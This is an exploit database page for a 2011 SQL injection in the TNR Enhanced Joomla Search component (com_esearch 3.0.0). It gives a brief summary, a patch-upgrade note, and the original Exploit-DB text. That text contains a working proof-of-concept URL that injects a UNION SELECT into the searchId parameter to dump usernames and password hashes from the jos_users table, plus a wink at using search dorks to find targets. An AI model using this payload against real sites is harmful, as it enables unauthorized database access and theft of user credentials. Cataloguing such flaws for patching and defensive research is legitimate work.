TNR Enhanced Joomla Search - exploit.company

vendor:

com_esearch

by:

NoGe

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: com_esearch

Affected Version From: 3.0.0

Affected Version To: 3.0.0

Patch Exists: YES

Related CWE: N/A

CPE: a:tnr_joomla:com_esearch

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2011

TNR Enhanced Joomla Search <= SQL Injection Vulnerability

An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing malicious SQL statements to the vulnerable application. This can be done by appending the malicious SQL statement to the searchId parameter in the HTTP request. This will allow the attacker to gain access to the database and execute arbitrary SQL queries.

Mitigation:

The vendor has released a patch to address this vulnerability. Users are advised to upgrade to the latest version of the software.

Source

Exploit-DB raw data:

=========================================================================================
 
  [o] TNR Enhanced Joomla Search <= SQL Injection Vulnerability
  
       Software : com_esearch ver 3.0.0
       Vendor   : http://www.tnrjoomla.com/
       Author   : NoGe
       Contact  : noge[dot]code[at]gmail[dot]com
       Home     : http://evilc0de.blogspot.com/

=========================================================================================

  [o] Exploit
 
       http://localhost/[path]/index.php?search=NoGe&option=com_esearch&searchId=[SQLi]


  [o] PoC

       http://localhost/[path]/index.php?search=NoGe&option=com_esearch&searchId=-1+union+select+1,group_concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14+from+jos_users--


  [o] Dork

       u all know what the dork is right? :))

=========================================================================================

  [o] Greetz

       Vrs-hCk OoN_BoY Paman zxvf s4va Angela Zhang stardustmemory
       aJe matthews wishnusakti kaka11 inc0mp13te martfella
       pizzyroot Genex H312Y }^-^{ noname tukulesto

=========================================================================================

  [o] August 07 2011 - Papua, Indonesia